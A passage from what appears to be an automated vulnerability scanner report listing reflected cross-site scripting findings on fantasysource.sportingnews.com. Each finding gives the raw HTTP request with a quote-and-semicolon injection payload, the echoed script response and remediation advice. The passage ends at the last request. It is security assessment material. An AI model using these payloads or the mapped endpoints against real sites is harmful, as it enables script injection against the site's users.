5.83. http://fantasysource.sportingnews.com/baseball/free [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Firm
Host:   http://fantasysource.sportingnews.com
Path:   /baseball/free

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload bbae5"%3b7b2f70e4cdd was submitted in the REST URL parameter 1. This input was echoed as bbae5";7b2f70e4cdd in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /baseballbbae5"%3b7b2f70e4cdd/free HTTP/1.1
Host: fantasysource.sportingnews.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 404 Not Found
Server: nginx
Date: Thu, 05 May 2011 10:53:04 GMT
Content-Type: text/html
Connection: keep-alive
Keep-Alive: timeout=5
Content-Length: 13085

<!DOCTYPE html>
<html>


<!--[if lt IE 7 ]> <html class="no-js ie6" xmlns:og="http://opengraphprotocol.org/schema/" xmlns:fb="http://www.facebook.com/2008/fbml"> <![endif]-->
<!--[if IE 7 ]> <html
...[SNIP]...
<script type="text/javascript">
function runOmni()
{
s_265.pfxID="spr";
s_265.pageName=":baseballbbae5";7b2f70e4cdd:error";
s_265.channel="us.sportnews";
s_265.linkInternalFilters="javascript:,sportingnews.com";
s_265.prop1=":premium content:baseballbbae5";7b2f70e4cdd:error";
s_265.prop12=document.URL.split('?')[0]
...[SNIP]...

5.84. http://fantasysource.sportingnews.com/baseball/free [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Firm
Host:   http://fantasysource.sportingnews.com
Path:   /baseball/free

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 93bb6"%3bc5e8272f943 was submitted in the REST URL parameter 2. This input was echoed as 93bb6";c5e8272f943 in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /baseball/free93bb6"%3bc5e8272f943 HTTP/1.1
Host: fantasysource.sportingnews.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 404 Not Found
Server: nginx
Date: Thu, 05 May 2011 10:53:05 GMT
Content-Type: text/html
Connection: keep-alive
Keep-Alive: timeout=5
Content-Length: 13083

<!DOCTYPE html>
<html>


<!--[if lt IE 7 ]> <html class="no-js ie6" xmlns:og="http://opengraphprotocol.org/schema/" xmlns:fb="http://www.facebook.com/2008/fbml"> <![endif]-->
<!--[if IE 7 ]> <html
...[SNIP]...
<script type="text/javascript">
function runOmni()
{
s_265.pfxID="spr";
s_265.pageName="mlb:free93bb6";c5e8272f943:error";
s_265.channel="us.sportnews";
s_265.linkInternalFilters="javascript:,sportingnews.com";
s_265.prop1="mlb:premium content:free93bb6";c5e8272f943:error";
s_265.prop12=document.URL.split('?')[0];
...[SNIP]...

5.85. http://fantasysource.sportingnews.com/baseball/promo [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Firm
Host:   http://fantasysource.sportingnews.com
Path:   /baseball/promo

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 3b8bc"%3b5944e8d17f4 was submitted in the REST URL parameter 1. This input was echoed as 3b8bc";5944e8d17f4 in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /baseball3b8bc"%3b5944e8d17f4/promo HTTP/1.1
Host: fantasysource.sportingnews.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 404 Not Found
Server: nginx
Date: Thu, 05 May 2011 10:53:04 GMT
Content-Type: text/html
Connection: keep-alive
Keep-Alive: timeout=5
Content-Length: 13085

<!DOCTYPE html>
<html>


<!--[if lt IE 7 ]> <html class="no-js ie6" xmlns:og="http://opengraphprotocol.org/schema/" xmlns:fb="http://www.facebook.com/2008/fbml"> <![endif]-->
<!--[if IE 7 ]> <html
...[SNIP]...
<script type="text/javascript">
function runOmni()
{
s_265.pfxID="spr";
s_265.pageName=":baseball3b8bc";5944e8d17f4:error";
s_265.channel="us.sportnews";
s_265.linkInternalFilters="javascript:,sportingnews.com";
s_265.prop1=":premium content:baseball3b8bc";5944e8d17f4:error";
s_265.prop12=document.URL.split('?')[0]
...[SNIP]...

5.86. http://fantasysource.sportingnews.com/baseball/promo [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Firm
Host:   http://fantasysource.sportingnews.com
Path:   /baseball/promo

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 14ed8"%3b39d6845c6c7 was submitted in the REST URL parameter 2. This input was echoed as 14ed8";39d6845c6c7 in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /baseball/promo14ed8"%3b39d6845c6c7 HTTP/1.1
Host: fantasysource.sportingnews.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 404 Not Found
Server: nginx
Date: Thu, 05 May 2011 10:53:06 GMT
Content-Type: text/html
Connection: keep-alive
Keep-Alive: timeout=5
Content-Length: 13088

<!DOCTYPE html>
<html>


<!--[if lt IE 7 ]> <html class="no-js ie6" xmlns:og="http://opengraphprotocol.org/schema/" xmlns:fb="http://www.facebook.com/2008/fbml"> <![endif]-->
<!--[if IE 7 ]> <html
...[SNIP]...
<script type="text/javascript">
function runOmni()
{
s_265.pfxID="spr";
s_265.pageName="mlb:promo14ed8";39d6845c6c7:error";
s_265.channel="us.sportnews";
s_265.linkInternalFilters="javascript:,sportingnews.com";
s_265.prop1="mlb:premium content:promo14ed8";39d6845c6c7:error";
s_265.prop12=document.URL.split('?')[0]
...[SNIP]...

5.87. http://fantasysource.sportingnews.com/baseball/rankings [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Firm
Host:   http://fantasysource.sportingnews.com
Path:   /baseball/rankings

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 193e1"%3b34ee4aa9b68 was submitted in the REST URL parameter 1. This input was echoed as 193e1";34ee4aa9b68 in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /baseball193e1"%3b34ee4aa9b68/rankings HTTP/1.1
Host: fantasysource.sportingnews.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response